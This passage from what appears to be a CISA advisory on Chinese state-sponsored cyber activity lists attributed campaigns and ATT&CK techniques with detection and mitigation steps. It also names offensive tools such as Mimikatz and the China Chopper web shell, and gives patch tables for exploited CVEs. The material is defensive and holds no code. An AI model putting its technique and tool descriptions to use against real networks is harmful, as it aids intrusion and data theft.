railway, robotics, power equipment, and agricultural machinery.[<a href="https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade">3</a>] China has exercised its increasingly sophisticated capabilities to illegitimately obtain U.S. intellectual property (IP), suppress both social and political perspectives deemed dangerous to China, and harm regional and international opponents.</p> <p>The U.S. 
Intelligence Community and various private sector threat intelligence organizations have identified the Chinese People’s Liberation Army (PLA) and Ministry of State Security (MSS) as driving forces behind Chinese state-sponsored cyberattacks–either through contractors in the Chinese private sector or by the PLA and MSS entities themselves. China continues to engage in espionage-related activities that include theft of sensitive information such as innovation capital, IP, and personally identifiable information (PII). China has demonstrated a willingness to push the boundaries of their activities to secure information critical to advancing their economic prowess and competitive advantage.</p> <h4>Chinese Cyber Activity</h4> <p>According to open-source reporting, offensive cyber operations attributed to the Chinese government targeted, and continue to target, a variety of industries and organizations in the United States, including healthcare, financial services, defense industrial base, energy, government facilities, chemical, critical manufacturing (including automotive and aerospace), communications, IT, international trade, education, videogaming, faith-based organizations, and law firms.</p> <p>Additionally, numerous Department of Justice (DOJ) indictments over several years provide evidence to suggest Chinese threat actors continuously seek to illegally obtain and exfiltrate U.S. IP. 
Their targets also include western companies with operations inside China.</p> <p>Public reporting that associates Chinese actors with a range of high-profile attacks and offensive cyber activity includes:</p> <ul> <li><strong>February 2013 – Cyber Threat Intelligence Researchers Link Advanced Persistent Threat (APT) 1 to China:</strong> a comprehensive report publicly exposed APT1 as part of China’s military cyber operations and a multi-year effort that exfiltrated IP from roughly 141 companies spanning 20 major industries.[<a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">4</a>] APT1 established access to the victims’ networks and methodically exfiltrated IP across a large range of industries identified in China’s 12th 5-Year Plan. A year later, the DOJ indicted Chinese cyber threat actors assigned to PLA Unit 61398 for the first time (also highlighted in the report).[<a href="https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor">5</a>]</li> <li><strong>April 2017 – Chinese APTs Targeting IP in 12 Countries:</strong> CISA announced Chinese state-backed APTs carried out a multi-year campaign of cyber-enabled IP theft that targeted global technology service providers and their customers. 
The threat actors leveraged stolen administrative credentials (local and domain) and placed sophisticated malware on critical systems in an effort to steal the IP and sensitive data of companies located in at least 12 countries.[<a href="https://us-cert.cisa.gov/ncas/alerts/TA17-117A">6</a>]</li> <li><strong>December 2018 – Chinese Cyber Threat Actors Indicted for Compromising Managed Service Providers (MSPs):</strong> DOJ indicted two Chinese cyber threat actors believed to be associated with APT10, who targeted MSPs and their large customer base through phishing and spearphishing campaigns aimed at exfiltrating sensitive business data and, possibly, PII.[<a href="https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers">7</a>] CISA also briefed stakeholders on Chinese APT groups who targeted MSPs and their customers to steal data and further operationalize commercial and economic espionage.[<a href="https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf">8</a>]</li> <li><strong>February 2020 – China’s Military Indicted for 2017 Equifax Hack:</strong> DOJ indicted members of China’s PLA for stealing large amounts of PII and IP. The Chinese cyber threat actors exploited a vulnerability in the company’s dispute resolution website to enter the network, conduct reconnaissance, upload malware, and steal credentials to extract the targeted data. The breach impacted roughly half of all American citizens and stole Equifax’s trade secrets.[<a href="https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military">9</a>]</li> <li><strong>May 2020 – China Targets COVID-19 Research Organizations:</strong> the Federal Bureau of Investigation (FBI) and CISA reported the targeting and compromise of U.S. 
organizations conducting COVID-19-related research by cyber actors affiliated with China.[<a href="https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations">10</a>] Large-scale password spraying campaigns were a commonly observed tactic in illicitly obtaining IP related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.[<a href="https://us-cert.cisa.gov/ncas/alerts/AA20126A">11</a>],[<a href="https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity">12</a>]</li> </ul> <h4>Common TTPs of Publicly Known Chinese Threat Actors</h4> <p>The section below provides common, publicly known TTPs employed by Chinese threat actors, mapped to the MITRE ATT&amp;CK framework. Where possible, the tables include actions for detection and mitigation. This section is not exhaustive and does not detail all TTPs or detection and mitigation actions.</p> <h4>PRE-ATT&amp;CK TTPs</h4> <p>Chinese threat actors commonly use the techniques listed in table 1 to achieve reconnaissance (<em>Technical Information Gathering</em> [<a href="https://attack.mitre.org/tactics/TA0015/">TA0015</a>]), staging (<em>Stage Capabilities</em> [<a href="https://attack.mitre.org/tactics/TA0026/">TA0026</a>]), and testing (<em>Test Capabilities</em> [<a href="https://attack.mitre.org/tactics/TA0025/">TA0025</a>]) before executing an attack. 
PRE-ATT&amp;CK techniques can be difficult to detect and mitigate; however, defenders should be aware of their use.</p> <p class="MsoCaption text-align-center" style="page-break-after:avoid"><em>Table 1: Chinese threat actor PRE-ATT&amp;CK techniques</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 844.9px; height: 312px; margin-left: auto; margin-right: auto;"> <thead> <tr> <th scope="col"><strong>Technique</strong></th> <th scope="col" style="width: 630px;"><strong>Description</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left;"><em>Acquire and/or Use 3rd Party Software Services</em> [<a href="https://attack.mitre.org/techniques/T1330/">T1330</a>]</td> <td scope="col" style="text-align: left; width: 630px;">Staging and launching attacks from software-as-a-service (SaaS) solutions that cannot be easily tied back to the APT</td> </tr> <tr> <td scope="col" style="text-align: left;"><em>Compromise 3rd Party Infrastructure to Support Delivery</em> [<a href="https://attack.mitre.org/techniques/T1334/">T1334</a>]</td> <td scope="col" style="text-align: left; width: 630px;">Compromising infrastructure owned by other parties to facilitate attacks (instead of directly purchasing infrastructure)</td> </tr> <tr> <td scope="col" style="text-align: left;"><em>Domain Registration Hijacking</em> [<a href="https://attack.mitre.org/techniques/T1326/">T1326</a>]</td> <td scope="col" style="text-align: left; width: 630px;">Changing the registration of a domain name without the permission of its original registrant and then using the legitimate domain as a launch point for malicious purposes</td> </tr> <tr> <td scope="col" style="text-align: left;"><em>Acquire Open-Source Intelligence (OSINT) Data Sets and Information</em> [<a href="https://attack.mitre.org/techniques/T1247/">T1247</a>]</td> <td scope="col" style="text-align: left; width: 630px;">Gathering data and information from publicly 
available sources, including public-facing websites of the target organization</td> </tr> <tr> <td scope="col" style="text-align: left;"><em>Conduct Active Scanning </em>[<a href="https://attack.mitre.org/techniques/T1254/">T1254</a>]</td> <td scope="col" style="text-align: left; width: 630px;">Gathering information on target systems by scanning the systems for vulnerabilities. Adversaries are likely using tools such as Shodan to identify vulnerable devices connected to the internet</td> </tr> <tr> <td scope="col" style="text-align: left;"><em>Analyze Architecture and Configuration Posture </em>[<a href="https://attack.mitre.org/techniques/T1288/">T1288</a>]</td> <td scope="col" style="text-align: left; width: 630px;">Analyzing technical scan results to identify architectural flaws, misconfigurations, or improper security controls in victim networks</td> </tr> <tr> <td scope="col" style="text-align: left;"><em>Upload, Install, and Configure Software/Tools</em> [<a href="https://attack.mitre.org/techniques/T1362">T1362</a>]</td> <td scope="col" style="text-align: left; width: 630px;">Placing malware on systems illegitimately for use during later stages of an attack to facilitate exploitability and gain remote access</td> </tr> </tbody> </table> <h4>Enterprise ATT&amp;CK TTPs</h4> <p>Chinese threat actors often employ publicly known TTPs against enterprise networks. 
To orchestrate attacks, they use commonly implemented security testing tools and frameworks, such as:</p> <ul> <li>Cobalt Strike and Beacon</li> <li>Mimikatz</li> <li>PoisonIvy</li> <li>PowerShell Empire</li> <li>China Chopper Web Shell</li> </ul> <p>Table 2 lists common, publicly known, TTPs used by Chinese threat actors against enterprise networks and provides options for detection and mitigation based on the MITRE ATT&amp;CK framework.</p> <p class="text-align-center"><em>Table 2: Common Chinese threat actor techniques, detection, and mitigation</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 849.9px; height: 312px; margin-left: auto; margin-right: auto;"> <thead> <tr> <th scope="col" style="width: 134px;"><strong>Technique / Sub-Technique</strong></th> <th scope="col" style="width: 230px;"><strong>Detection</strong></th> <th scope="col" style="width: 466px;"><strong>Mitigation</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Obfuscated Files or Information </em>[<a href="https://attack.mitre.org/techniques/T1027/">T1027</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Detect obfuscation by analyzing signatures of modified files.</li> <li>Flag common syntax used in obfuscation.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Use antivirus/antimalware software to analyze commands after processing.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Phishing: Spearphishing Attachment </em>[<a href="https://attack.mitre.org/techniques/T1566/001/">T1566.001</a>] and <em>Spearphishing Link </em>[<a href="https://attack.mitre.org/techniques/T1566/002/">T1566.002</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Use network intrusion detection systems (NIDS) and email gateways to detect suspicious attachments in email entering the network.</li> 
<li>Use detonation chambers to inspect email attachments in isolated environments.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Quarantine suspicious files with antivirus solutions.</li> <li>Use network intrusion prevention systems to scan and remove malicious email attachments.</li> <li>Train users to identify phishing emails and notify IT.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>System Network Configuration Discovery</em> [<a href="https://attack.mitre.org/techniques/T1016/">T1016</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Monitor for processes and command-line arguments that could be used by an adversary to gather system and network information.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Command and Scripting Interpreter: Windows Command Shell </em>[<a href="https://attack.mitre.org/techniques/T1059/003/">T1059.003</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Identify normal scripting behavior on the system then monitor processes and command-line arguments for suspicious script execution behavior.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Only permit execution of signed scripts.</li> <li>Disable any unused shells or interpreters. 
</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>User Execution: Malicious File </em>[<a href="https://attack.mitre.org/techniques/T1204/002/">T1204.002</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Monitor the execution and command-line arguments of applications (including compression applications) that an adversary may use to execute a malicious file through user interaction.</li> <li>Set antivirus software to detect malicious documents and files downloaded and installed on endpoints.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Use execution prevention to prevent the running of executables disguised as other files.</li> <li>Train users to identify phishing attacks and other malicious events that may require user interaction.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder </em>[<a href="https://attack.mitre.org/techniques/T1547/001/">T1547.001</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Monitor the Startup folder for additions and changes.</li> <li>Monitor the registry for changes to Run keys that do not correlate to known patches or software updates.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Command and Scripting Interpreter: PowerShell </em>[<a href="https://attack.mitre.org/techniques/T1059/001/">T1059.001</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Enable PowerShell logging.</li> <li>Monitor for changes in PowerShell execution policy as a method of identifying malicious use of PowerShell.</li> <li>Monitor 
for PowerShell execution generally in environments where PowerShell is not typically used.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Set PowerShell execution policy to execute only signed scripts.</li> <li>Disable PowerShell if not needed by the system.</li> <li>Disable the WinRM service to help prevent use of PowerShell for remote execution.</li> <li>Restrict PowerShell execution policy to administrators.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Hijack Execution Flow: DLL Side-Loading </em>[<a href="https://attack.mitre.org/techniques/T1574/002/">T1574.002</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Track Dynamic Link Library (DLL) metadata, and compare DLLs that are loaded at process execution time against previous executions to detect unusual differences unrelated to patching.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Use the program <code>sxstrace.exe</code> to check manifest files for side-loading vulnerabilities in software.</li> <li>Update software regularly, including patches for DLL side-loading vulnerabilities.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Ingress Tool Transfer</em> [<a href="https://attack.mitre.org/techniques/T1105/">T1105</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Monitor for unexpected file creation or file transfers into the network from external systems, which may be indicative of attackers staging tools in the compromised environment.</li> <li>Analyze network traffic for unusual data flows (e.g., a client sending much more data than it receives from a server).</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Use network intrusion detection and prevention systems to identify traffic for specific adversary malware or unusual data transfer over protocols such as File Transfer 
Protocol.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Remote System Discovery</em> [<a href="https://attack.mitre.org/techniques/T1018/">T1018</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Monitor processes and command-line arguments for actions that could be taken to gather system and network information.</li> <li>In cloud environments, usage of commands and application program interfaces (APIs) to request information about remote systems combined with additional unexpected commands may be a sign of malicious use.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Software Deployment Tools</em> [<a href="https://attack.mitre.org/techniques/T1072/">T1072</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Identify the typical use pattern of third-party deployment software, then monitor for irregular deployment activity.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Isolate critical network systems access using group policies, multi-factor authentication (MFA), and firewalls.</li> <li>Patch deployment systems regularly.</li> <li>Use unique and limited credentials for access to deployment systems.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Brute Force: Password Spraying</em> [<a href="https://attack.mitre.org/techniques/T1110/003/">T1110.003</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Monitor logs for failed authentication attempts to valid accounts.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Use MFA.</li> <li>Set account lockout policies 
after a certain number of failed login attempts.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Network Service Scanning</em> [<a href="https://attack.mitre.org/techniques/T1046/">T1046</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Use NIDS to identify scanning activity.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Close unnecessary ports and services.</li> <li>Segment network to protect critical servers and devices.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Email Collection </em>[<a href="https://attack.mitre.org/techniques/T1114/">T1114</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Monitor processes and command-line arguments for actions that could be taken to gather local email files.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Encrypt sensitive emails.</li> <li>Audit auto-forwarding email rules regularly.</li> <li>Use MFA for public-facing webmail servers.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Proxy: External Proxy</em> [<a href="https://attack.mitre.org/techniques/T1090/002/">T1090.002</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Use NIDS and prevention systems to identify traffic for specific adversary malware using network signatures.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Drive-by Compromise </em>[<a href="https://attack.mitre.org/techniques/T1189/">T1189</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Use Firewalls and proxies to inspect URLs for potentially 
known-bad domains or parameters.</li> <li>Monitor network intrusion detection systems (IDS) to detect malicious scripts, and monitor endpoints for abnormal behavior.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Isolate and sandbox impacted systems and applications to restrict the spread of malware.</li> <li>Leverage security applications to identify malicious behavior during exploitation.</li> <li>Restrict web-based content through ad-blockers and script-blocking extensions.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Server Software Component: Web Shell</em> [<a href="https://attack.mitre.org/techniques/T1505/003/">T1505.003</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Analyze authentication logs, files, netflow/enclave netflow, and leverage process monitoring to discover anomalous activity.</li> </ul> </td> <td scope="col" style="text-align: left; width: 466px;"> <ul> <li>Patch vulnerabilities in internet-facing applications.</li> <li>Leverage file integrity monitoring to identify file changes.</li> <li>Configure the server to block access to the web-accessible directory, following the principle of least privilege.</li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 134px;"><em>Application Layer Protocol: File Transfer Protocols</em> [<a href="https://attack.mitre.org/techniques/T1071/002/">T1071.002</a>] and <em>DNS</em> [<a href="https://attack.mitre.org/techniques/T1071/004/">T1071.004</a>]</td> <td scope="col" style="text-align: left; width: 230px;"> <ul> <li>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).</li> <li>Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.</li> </ul> </td> <td 
scope="col" style="text-align: left; width: 466px;"> <ul> <li>Leverage NIDS and NIPS using network signatures to identify traffic for specific adversary malware.</li> </ul> </td> </tr> </tbody> </table> <h4>Additional APT Activity</h4> <p>The TTPs listed above have been repeatedly used across the spectrum of Chinese threat actors. The mitigations referenced in this alert can help reduce vulnerability to these TTPs; however, defenders should also maintain heightened awareness of threat actors that are more innovative in their approach, making it difficult to detect and respond to compromise. Publicly reported examples [<a href="https://www.fireeye.com/current-threats/apt-groups.html">13</a>] include:</p> <ul> <li><strong>APT3</strong> (known as UPS Team) is known for deploying zero-day attacks that target Internet Explorer, Firefox, and Adobe Flash Player. The group’s custom implants and changing Command and Control (C2) infrastructure make them difficult to track. APT3 exploits use Rivest Cipher 4 (RC4) encryption to communicate and bypass address space layout randomization (ASLR)/Data Execution Prevention (DEP) by using Return Oriented Programming (ROP) chains.[<a href="https://attack.mitre.org/groups/G0022/">14</a>]</li> <li><strong>APT10</strong> (known as MenuPass Group) has established access to victim networks through compromised service providers, making it difficult for network defenders to identify the malicious traffic.</li> <li><strong>APT19</strong> (known as Codoso and Deep Panda) is known for developing custom Rich Text Format (RTF) and macro-enabled Microsoft Office documents for both implants and payloads. 
The group has backdoored software, such as software serial generators, and makes expert use of PowerShell for C2 over Hypertext Transfer Protocol (HTTP)/Hypertext Transfer Protocol Secure (HTTPS).[<a href="https://attack.mitre.org/groups/G0073/">15</a>]</li> <li><strong>APT40</strong> (known as Leviathan) has targeted external infrastructure with success, including internet-facing routers and virtual private networks.</li> <li><strong>APT41</strong> (known as Double Dragon) has exploited vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central to compromise victims.[<a href="https://attack.mitre.org/groups/G0096/">16</a>]</li> </ul> <h3>Mitigations</h3><h3>Recommended Actions</h3> <p>The following list provides actionable technical recommendations for IT security professionals to reduce their organization’s overall vulnerability. These recommendations are not exhaustive; rather, they focus on the actions that will greatly reduce stakeholders’ attack surface.</p> <ol> <li><strong>Patch systems and equipment promptly and diligently. </strong>Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing (i.e., internet) equipment. Certain vulnerabilities—including CVE-2012-0158 in Microsoft products [<a href="https://us-cert.cisa.gov/ncas/alerts/aa20-133a">17</a>], CVE-2019-19781 in Citrix devices [<a href="https://us-cert.cisa.gov/ncas/alerts/aa20-020a">18</a>], and CVE-2020-5902 in BIG-IP Traffic Management User Interface [<a href="https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve">19</a>]—have presented APTs with prime targets to gain initial access. 
Chinese APTs often use existing exploit code to target routinely exploited vulnerabilities [<a href="https://us-cert.cisa.gov/ncas/alerts/aa20-133a">20</a>], an opportunistic approach that requires limited resources. See table 3 for patch information on CVEs that have been routinely exploited by Chinese APTs. See table 4 for patch information on vulnerabilities that the National Security Agency (NSA) has stated are actively used by Chinese state-sponsored cyber actors.</li> </ol> <p class="text-align-center"><em>Table 3: Patch information for vulnerabilities routinely exploited by Chinese APT actors</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 837.9px; height: 312px; margin-left: auto; margin-right: auto;"> <thead> <tr> <th scope="col" style="width: 115px;"><strong>Vulnerability</strong></th> <th scope="col" style="width: 247px;"><strong>Vulnerable Products</strong></th> <th scope="col" style="width: 455px;"><strong>Patch Information</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2012-0158">CVE-2012-0158</a></td> <td scope="col" style="text-align: left; width: 247px;"> <p>Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0</p> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027">Microsoft Security Bulletin MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-5902">CVE-2020-5902</a></td> <td 
scope="col" style="text-align: left; width: 247px;"> <ul> <li>BIG-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://support.f5.com/csp/article/K52145254">F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19781">CVE-2019-19781</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Citrix Application Delivery Controller</li> <li>Citrix Gateway</li> <li>Citrix SDWAN WANOP</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0</a></li> <li><a href="https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/">Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3</a></li> <li><a href="https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0</a></li> <li><a href="https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11510">CVE-2019-11510</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 
8.1R1 - 8.1R15</li> <li>Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101">Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16920">CVE-2019-16920</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>D-Link products DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10124">D-Link Security Advisory: DAP-1533 Rv Ax, DGL-5500 Rv Ax, DHP-1565 Rv Ax, DIR-130 Rv Ax, DIR-330 Rv Ax, DIR-615 Rv Ix, (non-US) DIR-652 Rv Bx, DIR-655 Rv Cx, DIR-825 Rv Cx, DIR-835 Rv Ax, DIR-855L Rv Ax, (non-US) DIR-862 Rv Ax, DIR-866L Rv Ax :: CVE-2019-16920 :: Unauthenticated Remote Code Execution (RCE) Vulnerability</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16278">CVE-2019-16278</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Nostromo 1.9.6 and below</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html">Nostromo 1.9.6 Directory Traversal / Remote Command Execution</a></li> <li><a href="https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html">Nostromo 1.9.6 Remote Code Execution</a></li> </ul> </td> </tr> <tr> <td scope="col" 
style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-1652">CVE-2019-1652</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject">Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-1653">CVE-2019-1653</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info">Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 115px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-10189">CVE-2020-10189</a></td> <td scope="col" style="text-align: left; width: 247px;"> <ul> <li>Zoho ManageEngine Desktop Central before 10.0.474</li> </ul> </td> <td scope="col" style="text-align: left; width: 455px;"> <ul> <li><a href="https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html">ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)</a></li> </ul> </td> </tr> </tbody> </table> <p class="text-align-center"><em>Table 4: Patch information for NSA listed vulnerabilities used by Chinese state-sponsored cyber actors [<a 
